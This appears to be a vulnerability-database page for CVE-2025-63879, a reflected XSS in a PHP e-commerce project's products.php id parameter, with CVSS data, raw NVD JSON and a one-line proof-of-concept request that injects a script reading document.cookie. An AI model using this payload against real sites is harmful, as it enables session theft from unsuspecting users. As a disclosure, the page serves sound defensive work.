Security Vulnerability Report
中文
CVE-2025-63879 CVSS 6.1 MEDIUM

CVE-2025-63879

Published: 2025-11-19 16:15:49
Last Modified: 2025-12-12 16:12:12

Description

A reflected cross-site scripted (XSS) vulnerability in the /ecommerce/products.php component of E-commerce Project v1.0 and earlier allows attackers to execute arbitrary Javascript in the context of a user's browser via injecting a crafted payload into the id parameter.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:learnwithfair:php-ecommerce-project:1.0:*:*:*:*:*:*:* - VULNERABLE
E-commerce Project <= v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
GET /ecommerce/products.php?id=<script>alert(document.cookie)</script> HTTP/1.1 Host: target.com

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63879", "sourceIdentifier": "[email protected]", "published": "2025-11-19T16:15:49.280", "lastModified": "2025-12-12T16:12:11.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripted (XSS) vulnerability in the /ecommerce/products.php component of E-commerce Project v1.0 and earlier allows attackers to execute arbitrary Javascript in the context of a user's browser via injecting a crafted payload into the id parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:learnwithfair:php-ecommerce-project:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B4FF6D1-F1AF-457B-BDD0-109A9BB49DA0"}]}]}], "references": [{"url": "https://github.com/rumanaemu/CVE-Research/blob/main/CVE-2025-63879.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.linkedin.com/in/rumana-khatun-208aa731b/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}